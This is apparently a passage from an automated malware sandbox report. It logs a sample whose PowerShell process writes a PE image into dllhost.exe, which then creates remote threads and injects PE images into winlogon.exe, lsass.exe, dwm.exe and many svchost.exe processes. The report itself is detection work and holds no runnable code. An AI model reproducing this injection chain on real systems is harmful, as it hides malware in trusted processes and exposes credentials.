Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\spoolsv.exe EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E102EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CFCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B1222EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E4462EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 93252EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 63CE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0132EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44F92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30852EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 76162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 28725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 22125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2EC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 21F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2FD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 16225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15C42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 497C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3DBE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F1DC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 46E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 47072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 557A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\spoolsv.exe EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E102EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CFCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9312EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B1222EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E4462EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 93252EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 63CE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0132EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44F92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30852EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 76162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 28725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 22125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2EC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 21F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2FD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 16225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15C42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 497C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3DBE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A9EB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 98472EBC

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F20A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
